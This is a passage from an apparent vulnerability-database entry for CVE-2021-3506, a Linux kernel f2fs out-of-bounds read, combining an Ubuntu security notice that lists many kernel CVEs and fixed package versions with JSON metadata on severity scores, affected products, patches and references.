It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)
It was discovered that the NFC implementation in the Linux kernel did not properly handle failed connect events leading to a NULL pointer dereference. A local attacker could use this to cause a denial of service. (CVE-2021-38208)
It was discovered that the configfs interface for USB gadgets in the Linux kernel contained a race condition. (CVE-2021-39648)
It was discovered that the ext4 file system in the Linux kernel contained a race condition when writing xattrs to an inode. A local attacker could use this to cause a denial of service or possibly gain administrative privileges. (CVE-2021-40490)
It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008)
It was discovered that the ISDN CAPI implementation in the Linux kernel contained a race condition in certain situations that could trigger an array out-of-bounds bug. A privileged local attacker could possibly use this to cause a denial of service or execute arbitrary code. (CVE-2021-43389)
It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095)
Wenqing Liu discovered that the f2fs file system in the Linux kernel did not properly validate the last xattr entry in an inode. An attacker could use this to construct a malicious f2fs image that, when mounted and operated on, could cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-45469)
Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485)
It was discovered that the per cpu memory allocator in the Linux kernel could report kernel pointers via dmesg. An attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. (CVE-2018-5995)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM:
  linux-image-4.4.0-1103-kvm        4.4.0-1103.112
  linux-image-4.4.0-1138-aws        4.4.0-1138.152
  linux-image-4.4.0-222-generic     4.4.0-222.255
  linux-image-4.4.0-222-lowlatency  4.4.0-222.255
  linux-image-aws                   4.4.0.1138.143
  linux-image-generic               4.4.0.222.229
  linux-image-kvm                   4.4.0.1103.101
  linux-image-lowlatency            4.4.0.222.229
  linux-image-virtual               4.4.0.222.229
Ubuntu 14.04 ESM:
  linux-image-4.4.0-1102-aws         4.4.0-1102.107
  linux-image-4.4.0-222-generic      4.4.0-222.255~14.04.1
  linux-image-4.4.0-222-lowlatency   4.4.0-222.255~14.04.1
  linux-image-aws                    4.4.0.1102.100
  linux-image-generic-lts-xenial     4.4.0.222.193
  linux-image-lowlatency-lts-xenial  4.4.0.222.193
  linux-image-virtual-lts-xenial     4.4.0.222.193
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References:
  https://ubuntu.com/security/notices/USN-5343-1
  CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449,
  CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672,
  CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555,
  CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129,
  CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688,
  CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033,
  CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483,
  CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612,
  CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204,
  CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008,
  CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485,
  CVE-2022-0492

This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04.
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "solidfire baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.12"
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 0.8,
"vendor": "linux",
"version": "5.12.0-rc4"
},
{
"_id": null,
"model": "kernel",
"scope": "eq",
"trust": 0.8,
"vendor": "linux",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu",
"sources": [
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
}
],
"trust": 0.7
},
"cve": "CVE-2021-3506",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 5.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2021-3506",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 5.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-391284",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2021-3506",
"impactScore": 5.2,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-3506",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-3506",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-3506",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-1357",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-391284",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-3506",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"description": {
"_id": null,
"data": "An out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel in versions before 5.12.0-rc4. A bounds check failure allows a local attacker to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. Linux Kernel Exists in an out-of-bounds read vulnerability.Information is obtained and service operation is interrupted (DoS) It may be in a state. The vulnerability stems from a boundary check failure. ==========================================================================\nUbuntu Security Notice USN-5343-1\nMarch 22, 2022\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty\n\nDetails:\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly restrict mount namespaces, when mounted with the non-default\nallow_userns option set. A local attacker could use this to gain\nadministrative privileges. (CVE-2016-2853)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly maintain POSIX ACL xattr data, when mounted with the non-default\nallow_userns option. 
A local attacker could possibly use this to gain\nelevated privileges. (CVE-2016-2854)\n\nIt was discovered that the f2fs file system in the Linux kernel did not\nproperly validate metadata in some situations. An attacker could use this\nto construct a malicious f2fs image that, when mounted and operated on,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-19449)\n\nIt was discovered that the XFS file system implementation in the Linux\nkernel did not properly validate meta data in some circumstances. An\nattacker could use this to construct a malicious XFS image that, when\nmounted, could cause a denial of service. (CVE-2020-12655)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly handle error conditions in some situations,\nleading to an infinite loop. A local attacker could use this to cause a\ndenial of service. (CVE-2020-25673)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. 
(CVE-2020-26147)\n\nIt was discovered that the BR/EDR pin-code pairing procedure in the Linux\nkernel was vulnerable to an impersonation attack. A physically proximate\nattacker could possibly use this to pair to a device without knowledge of\nthe pin-code. An authenticated attacker could possibly\nuse this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)\n\nIt was discovered that the FUSE user space file system implementation in\nthe Linux kernel did not properly handle bad inodes in some situations. A\nlocal attacker could possibly use this to cause a denial of service. \n(CVE-2020-36322)\n\nIt was discovered that the Infiniband RDMA userspace connection manager\nimplementation in the Linux kernel contained a race condition leading to a\nuse-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possible execute arbitrary code. \n(CVE-2020-36385)\n\nIt was discovered that the DRM subsystem in the Linux kernel contained\ndouble-free vulnerabilities. A privileged attacker could possibly use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-20292)\n\nIt was discovered that a race condition existed in the timer implementation\nin the Linux kernel. A privileged attacker could use this to cause a denial\nof service. (CVE-2021-20317)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). 
\n(CVE-2021-28688)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that a race condition existed in the netfilter subsystem\nof the Linux kernel when replacing tables. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that the CIPSO implementation in the Linux kernel did not\nproperly perform reference counting in some situations, leading to use-\nafter-free vulnerabilities. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33033)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nAsaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the\nLinux kernel did not properly validate large MTU requests from Virtual\nFunction (VF) devices. A local attacker could possibly use this to cause a\ndenial of service. (CVE-2021-33098)\n\nNorbert Slusarek discovered that the CAN broadcast manger (bcm) protocol\nimplementation in the Linux kernel did not properly initialize memory in\nsome situations. (CVE-2021-34693)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. 
A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3483)\n\nIt was discovered that the f2fs file system in the Linux kernel contained\nan out-of-bounds read vulnerability. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device initialization failure, leading to a double-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3564)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device detach events, leading to a use-after-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3573)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nIt was discovered that the Virtio console implementation in the Linux\nkernel did not properly validate input lengths in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2021-38160)\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly compute the access permissions for shadow pages in\nsome situations. A local attacker could use this to cause a denial of\nservice. (CVE-2021-38198)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. 
A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the NFC implementation in the Linux kernel did not\nproperly handle failed connect events leading to a NULL pointer\ndereference. A local attacker could use this to cause a denial of service. \n(CVE-2021-38208)\n\nIt was discovered that the configfs interface for USB gadgets in the Linux\nkernel contained a race condition. (CVE-2021-39648)\n\nIt was discovered that the ext4 file system in the Linux kernel contained a\nrace condition when writing xattrs to an inode. A local attacker could use\nthis to cause a denial of service or possibly gain administrative\nprivileges. (CVE-2021-40490)\n\nIt was discovered that the 6pack network protocol driver in the Linux\nkernel did not properly perform validation checks. A privileged attacker\ncould use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2021-42008)\n\nIt was discovered that the ISDN CAPI implementation in the Linux kernel\ncontained a race condition in certain situations that could trigger an\narray out-of-bounds bug. A privileged local attacker could possibly use\nthis to cause a denial of service or execute arbitrary code. \n(CVE-2021-43389)\n\nIt was discovered that the Phone Network protocol (PhoNet) implementation\nin the Linux kernel did not properly perform reference counting in some\nerror conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45095)\n\nWenqing Liu discovered that the f2fs file system in the Linux kernel did\nnot properly validate the last xattr entry in an inode. An attacker could\nuse this to construct a malicious f2fs image that, when mounted and\noperated on, could cause a denial of service (system crash) or possibly\nexecute arbitrary code. 
(CVE-2021-45469)\n\nAmit Klein discovered that the IPv6 implementation in the Linux kernel\ncould disclose internal state in some situations. An attacker could\npossibly use this to expose sensitive information. (CVE-2021-45485)\n\nIt was discovered that the per cpu memory allocator in the Linux kernel\ncould report kernel pointers via dmesg. An attacker could use this to\nexpose sensitive information or use it in conjunction with another kernel\nvulnerability. (CVE-2018-5995)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n linux-image-4.4.0-1103-kvm 4.4.0-1103.112\n linux-image-4.4.0-1138-aws 4.4.0-1138.152\n linux-image-4.4.0-222-generic 4.4.0-222.255\n linux-image-4.4.0-222-lowlatency 4.4.0-222.255\n linux-image-aws 4.4.0.1138.143\n linux-image-generic 4.4.0.222.229\n linux-image-kvm 4.4.0.1103.101\n linux-image-lowlatency 4.4.0.222.229\n linux-image-virtual 4.4.0.222.229\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1102-aws 4.4.0-1102.107\n linux-image-4.4.0-222-generic 4.4.0-222.255~14.04.1\n linux-image-4.4.0-222-lowlatency 4.4.0-222.255~14.04.1\n linux-image-aws 4.4.0.1102.100\n linux-image-generic-lts-xenial 4.4.0.222.193\n linux-image-lowlatency-lts-xenial 4.4.0.222.193\n linux-image-virtual-lts-xenial 4.4.0.222.193\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 
\n\nReferences:\n https://ubuntu.com/security/notices/USN-5343-1\n CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449,\n CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672,\n CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555,\n CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129,\n CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688,\n CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033,\n CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483,\n CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612,\n CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204,\n CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008,\n CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485,\n CVE-2022-0492\n. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3506"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-3506",
"trust": 4.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/28/2",
"trust": 2.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/08/1",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "163291",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "163249",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166400",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166417",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-24-319-06",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96191615",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163597",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021051016",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032316",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2216",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1235",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2453",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2249",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163301",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "163253",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "163255",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-391284",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-3506",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"id": "VAR-202104-1670",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:30:32.569000Z",
"patch": {
"_id": null,
"data": [
{
"title": "[PATCH]\u00a0f2fs",
"trust": 0.8,
"url": "http://www.kernel.org"
},
{
"title": "Linux kernel Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=148827"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-3506 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-125",
"trust": 1.1
},
{
"problemtype": "Out-of-bounds read (CWE-125) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://www.openwall.com/lists/oss-security/2021/03/28/2"
},
{
"trust": 2.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/08/1"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
},
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944298"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210611-0007/"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
},
{
"trust": 1.0,
"url": "https://www.mail-archive.com/linux-kernel%40vger.kernel.org/msg2520013.html"
},
{
"trust": 0.8,
"url": "https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg2520013.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96191615/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-319-06"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1235"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166400/ubuntu-security-notice-usn-5339-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021051016"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166417/ubuntu-security-notice-usn-5343-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2453"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032316"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163597/ubuntu-security-notice-usn-5016-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-out-of-bounds-memory-reading-via-remove-nats-in-journal-35115"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5000-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-4997-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/125.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q2/107"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-3506"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-2853"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26555"
},
{
